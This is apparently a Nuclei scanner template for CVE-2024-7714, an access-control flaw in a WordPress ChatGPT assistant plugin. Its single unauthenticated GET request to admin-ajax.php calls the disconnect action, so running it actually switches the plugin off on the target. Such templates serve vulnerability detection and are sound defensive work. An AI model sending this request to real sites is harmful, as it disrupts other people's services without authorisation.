41 lines
1.6 KiB
YAML
41 lines
1.6 KiB
YAML
id: CVE-2024-7714
|
|
|
|
info:
|
|
name: AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls
|
|
author: s4e-io
|
|
severity: medium
|
|
description: |
|
|
The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback
|
|
remediation: Fixed in 2.1.0
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-7714
|
|
- https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2024-7714
|
|
cwe-id: CWE-284
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.09599
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: ays-chatgpt-assistant-team
|
|
product: ays-chatgpt-assistant
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/plugins/ays-chatgpt-assistant"
|
|
tags: cve,cve2024,ays-chatgpt-assistant,wordpress,wp-plugin,wp,iac
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'regex("^true$", body)'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 4b0a00483046022100bdbe7d7b2f2802d87ca36eead8ef342616ac2deb6b62ad553f0c670ecd70a9f202210090cdb0adf148998469c6456de76728a9b85a9d162b3ee02af89f59394e8c4c60:922c64590222798bb761d5b6d8e72950 |